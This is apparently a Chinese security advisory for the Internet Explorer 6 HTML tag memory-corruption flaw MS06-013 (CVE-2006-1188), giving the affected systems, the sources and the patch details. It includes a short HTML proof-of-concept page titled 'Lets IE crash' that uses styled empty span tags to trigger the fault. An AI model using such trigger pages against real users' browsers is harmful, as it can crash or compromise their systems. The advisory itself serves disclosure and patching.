|
(MS06-013)Microsoft Internet Explorer HTML标签内存破坏漏洞 更新日期:2006-04-12 受影响系统: Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
- Microsoft Windows XP SP2
- Microsoft Windows Server 2003 SP1
- Microsoft Windows Server 2003描述: BUGTRAQ ID: 17468
CVE(CAN) ID: CVE-2006-1188 Microsoft Internet Explorer是微软发布的非常流行的WEB浏览器。 Internet Explorer在处理有特制标签的HTML元素时可能会破坏系统内存,成功利用这个漏洞的攻击者可以完全控制受影响的系统。 攻击者可以创建恶意的Web页面,如果用户访问了该页面的话就会导致内存破坏。 <*来源:Thomas Waldegger (bugtraq@morph3us.org)
链接:http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx?pf=true
http://www.us-cert.gov/cas/techalerts/TA06-101A.html
*> 测试方法: 警 告 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Lets IE crash</title>
<style type="text/css">
pre {
white-space:normal;
}
</style>
</head> <body> <pre>
<span /><span />
</pre> </body> </html> 建议: 厂商补丁: Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS06-013)以及相应补丁:
MS06-013:Cumulative Security Update for Internet Explorer (912812)
链接:http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx?pf=true
|
